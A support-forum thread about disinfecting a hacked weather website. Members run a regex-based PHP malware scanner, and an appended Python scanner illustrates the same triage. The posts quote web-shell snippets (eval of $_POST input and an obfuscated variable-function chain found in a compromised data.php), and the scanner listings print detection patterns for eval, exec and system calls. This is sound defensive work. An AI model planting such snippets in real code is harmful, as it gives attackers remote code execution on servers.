Welcome to the Cumulus Support forum.


Website hacked

Other discussion about creating web sites for Cumulus that doesn't have a specific subforum

Moderator: daj

rogerthn
Posts: 339
Joined: Thu 11 Apr 2013 6:31 pm
Weather Station: Ecowitt GW1000/GW1003
Operating System: Raspberry Pi OS Lite Buster
Location: Trollhättan Sweden

Re: Website hacked

Post by rogerthn »

saratogaWX wrote:
Fri 30 Apr 2021 9:30 pm
I've sent a PM with a link to a tool I developed to spot malware on PHP sites.

Best regards,
Ken

p.s. I've used this to help disinfect about 10 sites for folks so far.
May I please also have that link?

saratogaWX
Posts: 1077
Joined: Wed 06 May 2009 5:02 am
Weather Station: Davis Vantage Pro Plus
Operating System: Windows 10 Professional
Location: Saratoga, CA, USA

Re: Website hacked

Post by saratogaWX »

Sure.. PM sent.

water01
Posts: 2164
Joined: Sat 13 Aug 2011 9:33 am
Weather Station: WH1081
Operating System: Windows 10 64bit
Location: Burnham-on-Sea

Re: Website hacked

Post by water01 »

Could I also have it? Or perhaps we can make it part of the Wiki?
David

saratogaWX
Posts: 1077
Joined: Wed 06 May 2009 5:02 am
Weather Station: Davis Vantage Pro Plus
Operating System: Windows 10 Professional
Location: Saratoga, CA, USA

Re: Website hacked

Post by saratogaWX »

Sure, I guess it's not really a secret.

https://saratoga-weather.org/chk-files.php?sce=view

Place in the document root of your website. It will scan all .php and .htaccess files looking for possibly malicious content.

It will flag (based on a regex) things that look like constructed functions $functionname(), exec(), system(), eval(), base64_decode(), $_POST usage. It can flag harmless instances too, so it's important to sanity check the output; there can be a lot of false positives.

rogerthn
Posts: 339
Joined: Thu 11 Apr 2013 6:31 pm
Weather Station: Ecowitt GW1000/GW1003
Operating System: Raspberry Pi OS Lite Buster
Location: Trollhättan Sweden

Re: Website hacked

Post by rogerthn »

Thanks!
Is this what to look for?

Code:

5 instances of ....

saratogaWX
Posts: 1077
Joined: Wed 06 May 2009 5:02 am
Weather Station: Davis Vantage Pro Plus
Operating System: Windows 10 Professional
Location: Saratoga, CA, USA

Re: Website hacked

Post by saratogaWX »

That just shows the count of 'hits' that the regex found that deserve looking at.

Each 'hit' is shown above with the matching part in red. You have to examine it and determine if it's possibly malicious.

Things that look like
eval($_POST['a']) or
eval(base64_decode($_POST['a']))
are obviously bad.
As is something like
./data.php Created=20-Dec-2020 14:47:46 GMT Modified=20-Dec-2020 14:47:46 GMT size=184 bytes.
3 (count($b) == 8)?(($ij = $b[58].$b[88]) && ($qc = $ij($b[23].$b[42])) && ($_qc = $ij($b[65].$b[27])) && ($_qc = $qc($b[95], $_qc($ij($b[22])))) && @$_qc()) : $b;
(the $variable() functions are a give away that something untoward is happening)

Sometimes, a flagged entry happens inside a comment (// or # or /*...*/) so looks bad, but is not really executed, and so not harmful.

That's why the results found by the script have to be sanity checked, as the filter is cast quite wide.

PaulMy
Posts: 2668
Joined: Sun 28 Sep 2008 11:54 pm
Weather Station: Davis VP2+ Cumulus1 / CummulusMX
Operating System: Windows8 / Windows10
Location: Komoka, ON Canada

Re: Website hacked

Post by PaulMy »

Hi Ken,
I have run the script but not sure what to make of the results:

Code:

Match pattern used is '/(.x3D|chr\(61\)|eval\s*\(|@eval\s*\(|\s+base64_decode\s*\(|addtype|addhandler|RewriteRule|RewriteCond|\s+exec\s*\(|@exec\s*\(|\s+system\s*\(|@system\s*\(|\s+passthru\s*\(|@passthru\s*\(|\s+[@]{0,1]assert\s*\(|\s+assert_options\s*\(|\$_POST\[|=\s*\$[a-z0-9A-Z\_]+\s*\()/i'

   ./saratoga-malwarescanner3.php Created=02-May-2021 19:25:14 GMT Modified=02-May-2021 19:25:14 GMT size=7426 bytes.
28	  $toFind = '.x3D|chr\(61\)|eval\s*\(|@eval\s*\(|\s+base64_decode\s*\(|addtype|addhandler|RewriteRule|RewriteCond|\s+exec\s*\(|@exec\s*\(|\s+system\s*\(|@system\s*\(|\s+passthru\s*\(|@passthru\s*\(|\s+[@]{0,1]assert\s*\(|\s+assert_options\s*\(|\$_POST\[|=\s*\$[a-z0-9A-Z\_]+\s*\(';
   ./jpgraph/jpgraph_utils.inc.php Created=22-Mar-2021 02:35:45 GMT Modified=22-Mar-2021 02:35:45 GMT size=25399 bytes.
37	  @eval($t);
   ./jpgraph/jpgraph_legend.inc.php Created=22-Mar-2021 02:35:43 GMT Modified=22-Mar-2021 02:35:43 GMT size=18105 bytes.
212	  //echo "h=$h ({$this->mark_abs_vsize},{$this->ymargin})<br />";
7 instances of '.x3D|chr\(61\)|eval\s*\(|@eval\s*\(|\s+base64_decode\s*\(|addtype|addhandler|RewriteRule|RewriteCond|\s+exec\s*\(|@exec\s*\(|\s+system\s*\(|@system\s*\(|\s+passthru\s*\(|@passthru\s*\(|\s+[@]{0,1]assert\s*\(|\s+assert_options\s*\(|\$_POST\[|=\s*\$[a-z0-9A-Z\_]+\s*\(' found in 3 '.php;.htaccess;' files using 2.985 secs.
I have compared the two files in DiffMerge and the website files are identical to the files in the template download unzipped files, so appears no changes made to the files while on the webserver.

Should I be concerned or need to take any action?

Thanks,
Paul

saratogaWX
Posts: 1077
Joined: Wed 06 May 2009 5:02 am
Weather Station: Davis Vantage Pro Plus
Operating System: Windows 10 Professional
Location: Saratoga, CA, USA

Re: Website hacked

Post by saratogaWX »

So, of the ones displayed, only

Code:

   ./jpgraph/jpgraph_utils.inc.php Created=22-Mar-2021 02:35:45 GMT Modified=22-Mar-2021 02:35:45 GMT size=25399 bytes.
37	  @eval($t);
caught my eye. You should take a look in jpgraph_utils.inc.php for how $t is set by the code. If it comes from an argument ($_GET/$_POST/$_REQUEST) directly without 'sanitation', then it's a big problem. If $t is constructed without using any of the above, it's likely benign.
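As an added illustration of the triage Ken describes in this thread (the wide regex over .php and .htaccess files, the "$variable()" give-away, hits that sit inside comments, and checking how the argument of an eval() is set), here is a small Python scanner in the same spirit. It is not the saratoga-weather.org chk-files tool and does not use its exact pattern; the regex, the comment heuristic, the taint check and the sample PHP text are all constructed for this example.

```python
"""Heuristic scan of a PHP document root for web-shell style code.

Added example, not the saratoga-weather.org tool from the thread.  It reports
the kinds of constructs the thread describes, marks hits that are commented
out, and for eval() of a bare variable checks whether that variable is
assigned straight from request input anywhere in the same file.
"""
import re
from dataclasses import dataclass
from pathlib import Path
from typing import List, Optional, Tuple

# This pattern list is the example's own (constructed), not the thread tool's regex.
SUSPICIOUS = re.compile(
    r"(?P<call>\b(?:eval|exec|system|passthru|assert|base64_decode)\s*\()"
    r"|(?P<input>\$_(?:POST|GET|REQUEST)\s*\[)"
    r"|(?P<varcall>\$[A-Za-z_]\w*\s*\()",   # $ij(...) style call through a variable
    re.IGNORECASE,
)
EVAL_OF_VAR = re.compile(r"\beval\s*\(\s*\$(?P<name>[A-Za-z_]\w*)\s*\)", re.IGNORECASE)
REQUEST_INPUT = re.compile(r"\$_(?:POST|GET|REQUEST|COOKIE)\b", re.IGNORECASE)


@dataclass
class Hit:
    path: str
    lineno: int
    kind: str                 # "call", "input" or "varcall"
    matched: str
    line: str
    in_comment: bool          # heuristic: the hit is commented out, so not executed
    tainted_var: Optional[str] = None   # eval'd variable assigned from request input


def _comment_state(line: str, in_block: bool, match_start: int) -> Tuple[bool, bool]:
    """Return (hit_is_in_comment, in_block_after_line).

    Heuristic only: PHP strings are not parsed, so a '//' inside a string
    literal before the hit would be misread as a comment.  Good enough for
    triage; the final judgement stays with the person reading the output.
    """
    before = line[:match_start]
    if in_block:
        in_comment = "*/" not in before
    else:
        in_comment = "//" in before or "#" in before or "/*" in before
    last_open, last_close = line.rfind("/*"), line.rfind("*/")
    if last_open > last_close:
        in_block = True
    elif last_close > last_open:
        in_block = False
    return in_comment, in_block


def _assigned_from_request(text: str, name: str) -> bool:
    """True if $name is assigned with request input on the right-hand side."""
    assign = re.compile(r"\$" + re.escape(name) + r"\s*=(?!=)\s*(?P<rhs>[^;]*);")
    return any(REQUEST_INPUT.search(m.group("rhs")) for m in assign.finditer(text))


def scan_text(text: str, path: str = "<memory>") -> List[Hit]:
    """Scan one file's contents; at most one hit (the first match) per line."""
    hits: List[Hit] = []
    in_block = False
    for lineno, line in enumerate(text.splitlines(), start=1):
        m = SUSPICIOUS.search(line)
        if m is None:
            _, in_block = _comment_state(line, in_block, len(line))
            continue
        in_comment, in_block = _comment_state(line, in_block, m.start())
        tainted = None
        ev = EVAL_OF_VAR.search(line)
        if ev and _assigned_from_request(text, ev.group("name")):
            tainted = ev.group("name")
        hits.append(Hit(path, lineno, m.lastgroup or "", m.group(0),
                        line.strip(), in_comment, tainted))
    return hits


def scan_tree(root: str) -> List[Hit]:
    """Scan every .php file and .htaccess under root (the site's document root)."""
    hits: List[Hit] = []
    for p in sorted(Path(root).rglob("*")):
        if p.is_file() and (p.suffix == ".php" or p.name == ".htaccess"):
            hits.extend(scan_text(p.read_text(errors="replace"), str(p)))
    return hits


def triage(hits: List[Hit]) -> Tuple[List[Hit], List[Hit], List[Hit]]:
    """Split hits into: look at first / review by hand / commented-out noise."""
    urgent, review, noise = [], [], []
    for h in hits:
        if h.in_comment:
            noise.append(h)
        elif h.tainted_var or h.kind == "varcall":
            urgent.append(h)
        else:
            review.append(h)
    return urgent, review, noise


# Constructed sample mixing a commented-out jpgraph-style line, a tainted eval,
# an obfuscated $variable() call, a sanitised $_GET use and a block comment.
SAMPLE_PHP = r"""<?php
// debug line of the kind a graphing library leaves in, flagged but not executed
//echo "h=$h ({$this->mark_abs_vsize},{$this->ymargin})<br />";
$t = $_POST['code'];
@eval($t);
$b = str_split($payload);
($ij = $b[58].$b[88]) && ($qc = $ij($b[23].$b[42]));
$title = htmlspecialchars($_GET['title']);
/* legacy:
   system('ls');
*/
"""

if __name__ == "__main__":
    import sys
    root = sys.argv[1] if len(sys.argv) > 1 else "."
    urgent, review, noise = triage(scan_tree(root))
    for label, group in (("LOOK FIRST", urgent), ("REVIEW", review), ("COMMENTED OUT", noise)):
        for h in group:
            print(f"[{label}] {h.path}:{h.lineno} {h.kind} {h.matched!r}  {h.line}")
```

Run it with the document root as the argument. Like the thread's tool it flags its own source (the pattern strings contain the words it looks for), and a library debug line such as the jpgraph `//echo` one lands in the commented-out bucket rather than being silently dropped; the "look first" bucket is where eval() of a request-fed variable and $variable() calls end up, which is the same reading order Ken suggests above.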
